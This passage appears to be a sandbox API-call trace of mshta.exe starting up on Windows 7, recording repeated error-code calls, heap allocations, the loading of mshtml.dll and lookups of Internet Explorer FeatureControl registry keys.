[0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () 
returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.612] SetLastError (dwErrCode=0x0) [0060.612] GetLastError () returned 0x0 [0060.612] SetLastError (dwErrCode=0x0) [0060.612] GetLastError () returned 0x0 [0060.612] SetLastError (dwErrCode=0x0) [0060.612] GetLastError () returned 0x0 [0060.612] SetLastError (dwErrCode=0x0) [0060.612] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () 
returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () 
returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () 
returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x42c) returned 0x201610 [0060.623] GetLastError () returned 0x0 [0060.623] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x5fc) returned 0x201a48 [0060.624] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x200e78 | out: hHeap=0x200000) returned 1 [0060.625] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x972aef) returned 0x0 [0060.625] GetLastError () returned 0x0 [0060.625] GetVersion () returned 0x1db10106 [0060.625] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0060.625] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0060.625] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.626] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x105) returned 0x200e78 [0060.626] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x105) returned 0x200f88 [0060.626] RegOpenKeyExA (in: 
hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x33f85c | out: phkResult=0x33f85c*=0x42) returned 0x0 [0060.627] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x33f854, lpData=0x200e78, lpcbData=0x33f850*=0x105 | out: lpType=0x33f854*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x33f850*=0x1f) returned 0x0 [0060.722] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x74af0000 [0064.685] GetProcessHeap () returned 0x760000 [0064.685] GetVersion () returned 0x1db10106 [0064.685] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0064.686] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0064.686] HeapSetInformation (HeapHandle=0x760000, HeapInformationClass=0x0, HeapInformation=0x33f4e8, HeapInformationLength=0x4) returned 1 [0064.851] malloc (_Size=0x80) returned 0x112640 [0064.851] GetVersion () returned 0x1db10106 [0064.927] GetVersionExA (in: lpVersionInformation=0x33f3c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33f3c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0064.927] __dllonexit () returned 0x74d1717c [0064.927] __dllonexit () returned 0x74d173bd [0064.927] GetProcessHeap () returned 0x760000 [0064.927] __dllonexit () returned 0x74d17435 [0064.927] __dllonexit () returned 0x74d16e75 [0064.927] __dllonexit () returned 0x74d16ff5 [0064.927] __dllonexit () returned 0x74d171be [0064.927] __dllonexit () returned 0x74d172e2 [0064.927] __dllonexit () returned 0x74d17320 [0064.928] __dllonexit () returned 0x74d17370 [0064.928] __dllonexit () returned 0x74d16e53 [0064.928] __dllonexit () returned 0x74d16e66 [0064.928] __dllonexit () returned 
0x74d16a3e [0064.928] __dllonexit () returned 0x74d16a46 [0064.928] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0064.928] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0064.929] __dllonexit () returned 0x74d16a60 [0064.929] __dllonexit () returned 0x74d16a7a [0064.929] __dllonexit () returned 0x74d16a93 [0064.929] __dllonexit () returned 0x74d16aa7 [0064.929] __dllonexit () returned 0x74d16ac1 [0064.929] __dllonexit () returned 0x74d171f1 [0064.929] __dllonexit () returned 0x74d16ad0 [0064.929] __dllonexit () returned 0x74d16adf [0064.929] __dllonexit () returned 0x74d16aee [0064.930] __dllonexit () returned 0x74d16afd [0064.930] __dllonexit () returned 0x74d16b0d [0064.930] __dllonexit () returned 0x74d1720c [0064.930] __dllonexit () returned 0x74d16b1c [0064.930] __dllonexit () returned 0x74d16b2f [0064.930] __dllonexit () returned 0x74d16b49 [0064.930] __dllonexit () returned 0x74d16b58 [0064.930] __dllonexit () returned 0x74d16b67 [0064.930] __dllonexit () returned 0x74d16b76 [0064.931] __dllonexit () returned 0x74d16b85 [0064.931] __dllonexit () returned 0x74d16b94 [0064.931] __dllonexit () returned 0x74d16ba3 [0064.931] __dllonexit () returned 0x74d16bb2 [0064.931] __dllonexit () returned 0x74d16bc1 [0064.931] __dllonexit () returned 0x74d16bd0 [0064.931] __dllonexit () returned 0x74d16bdf [0064.931] __dllonexit () returned 0x74d16bee [0064.931] __dllonexit () returned 0x74d16bfd [0064.931] __dllonexit () returned 0x74d16c0c [0064.932] __dllonexit () returned 0x74d16c1b [0064.932] __dllonexit () returned 0x74d16c2a [0064.932] __dllonexit () returned 0x74d16c3d [0064.932] __dllonexit () returned 0x74d16c4c [0064.932] __dllonexit () returned 0x74d16c5b [0064.932] __dllonexit () returned 0x74d16c75 [0064.932] __dllonexit () returned 0x74d16c8f [0064.932] __dllonexit () returned 0x74d16ca9 [0064.933] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0064.933] MulDiv (nNumber=1073741823, 
nNumerator=384, nDenominator=1440) returned 286331153 [0064.933] __dllonexit () returned 0x74d16cb1 [0064.933] __dllonexit () returned 0x74d17294 [0064.933] __dllonexit () returned 0x74d16ccb [0064.933] __dllonexit () returned 0x74d16cd3 [0064.933] __dllonexit () returned 0x74d16ce2 [0064.934] __dllonexit () returned 0x74d16cf1 [0064.934] __dllonexit () returned 0x74d16d00 [0064.934] __dllonexit () returned 0x74d0f72d [0064.934] __dllonexit () returned 0x74d16d43 [0064.934] __dllonexit () returned 0x74d16d56 [0064.934] __dllonexit () returned 0x74d0f095 [0064.934] __dllonexit () returned 0x74d16d65 [0064.934] __dllonexit () returned 0x74d16d78 [0064.934] __dllonexit () returned 0x74d16d87 [0064.935] __dllonexit () returned 0x74d16d9a [0064.935] __dllonexit () returned 0x74d12256 [0064.935] __dllonexit () returned 0x74d1679d [0064.935] __dllonexit () returned 0x74d16dd5 [0064.935] __dllonexit () returned 0x74d16df8 [0064.935] __dllonexit () returned 0x74d16e07 [0064.935] __dllonexit () returned 0x74d176cb [0064.936] __dllonexit () returned 0x74d16e1a [0064.936] __dllonexit () returned 0x74d172aa [0064.936] __dllonexit () returned 0x74d172cb [0064.936] __dllonexit () returned 0x74d16e3a [0064.936] GetCurrentThreadId () returned 0x544 [0064.936] CoCreateGuid (in: pguid=0x7502ad20 | out: pguid=0x7502ad20*(Data1=0xb8f9e278, Data2=0xe2, Data3=0x47a6, Data4=([0]=0xae, [1]=0xf6, [2]=0xa6, [3]=0x27, [4]=0xd6, [5]=0xc9, [6]=0x45, [7]=0x41))) returned 0x0 [0064.939] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x77e988 [0064.939] __dllonexit () returned 0x74d1733d [0064.939] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33ee60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0064.939] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0064.939] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0064.939] StrCmpICW 
(pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0064.939] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x77eb90 [0064.939] SHRegGetValueW () returned 0x2 [0064.939] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0ac | out: phkResult=0x33f0ac*=0x0) returned 0x2 [0064.939] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a8 | out: phkResult=0x33f0a8*=0x0) returned 0x2 [0064.940] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0064.940] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.016] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.085] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.085] RegCloseKey (hKey=0x0) returned 0x6 [0065.085] RegCloseKey (hKey=0x0) returned 0x6 [0065.085] RegCloseKey (hKey=0x94) returned 0x0 [0065.085] RegCloseKey (hKey=0x98) returned 0x0 [0065.085] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.085] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, 
samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.085] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.086] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.086] RegCloseKey (hKey=0x0) returned 0x6 [0065.086] RegCloseKey (hKey=0x0) returned 0x6 [0065.086] RegCloseKey (hKey=0x98) returned 0x0 [0065.086] RegCloseKey (hKey=0x94) returned 0x0 [0065.086] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.086] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.086] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.086] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.086] RegCloseKey (hKey=0x0) returned 0x6 [0065.086] RegCloseKey (hKey=0x0) returned 0x6 [0065.087] RegCloseKey (hKey=0x94) returned 0x0 [0065.087] RegCloseKey (hKey=0x98) returned 0x0 [0065.087] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.087] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", 
ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.087] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.087] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x9c) returned 0x0 [0065.087] SHRegGetValueW () returned 0x2 [0065.087] SHRegGetValueW () returned 0x2 [0065.087] RegCloseKey (hKey=0x9c) returned 0x0 [0065.087] RegCloseKey (hKey=0x0) returned 0x6 [0065.087] RegCloseKey (hKey=0x0) returned 0x6 [0065.087] RegCloseKey (hKey=0x98) returned 0x0 [0065.088] RegCloseKey (hKey=0x94) returned 0x0 [0065.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.088] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.088] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.088] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.088] RegCloseKey (hKey=0x0) returned 0x6 [0065.088] RegCloseKey (hKey=0x0) returned 0x6 [0065.088] RegCloseKey (hKey=0x94) returned 0x0 [0065.088] RegCloseKey (hKey=0x98) returned 0x0 [0065.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.167] RegOpenKeyExW (in: 
hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.167] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.167] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.167] RegCloseKey (hKey=0x0) returned 0x6 [0065.168] RegCloseKey (hKey=0x0) returned 0x6 [0065.168] RegCloseKey (hKey=0x98) returned 0x0 [0065.168] RegCloseKey (hKey=0x94) returned 0x0 [0065.168] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.168] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.168] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.168] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.168] RegCloseKey (hKey=0x0) returned 0x6 [0065.168] RegCloseKey (hKey=0x0) returned 0x6 [0065.168] RegCloseKey (hKey=0x94) returned 0x0 [0065.168] RegCloseKey (hKey=0x98) returned 0x0 [0065.168] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.169] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.169] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.169] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.169] RegCloseKey (hKey=0x0) returned 0x6 [0065.169] RegCloseKey (hKey=0x0) returned 0x6 [0065.169] RegCloseKey (hKey=0x98) returned 0x0 [0065.169] RegCloseKey (hKey=0x94) returned 0x0 [0065.169] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.169] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.170] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.170] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.170] RegCloseKey (hKey=0x0) returned 0x6 [0065.170] RegCloseKey (hKey=0x0) returned 0x6 [0065.170] RegCloseKey (hKey=0x94) returned 0x0 [0065.170] RegCloseKey (hKey=0x98) returned 0x0 [0065.170] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.170] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.170] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.170] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.170] RegCloseKey (hKey=0x0) returned 0x6 [0065.171] RegCloseKey (hKey=0x0) returned 0x6 [0065.171] RegCloseKey (hKey=0x98) returned 0x0 [0065.171] RegCloseKey (hKey=0x94) returned 0x0 [0065.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.171] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.171] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.171] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.171] RegCloseKey (hKey=0x0) returned 0x6 [0065.171] RegCloseKey (hKey=0x0) returned 0x6 [0065.171] RegCloseKey (hKey=0x94) returned 0x0 [0065.171] RegCloseKey (hKey=0x98) returned 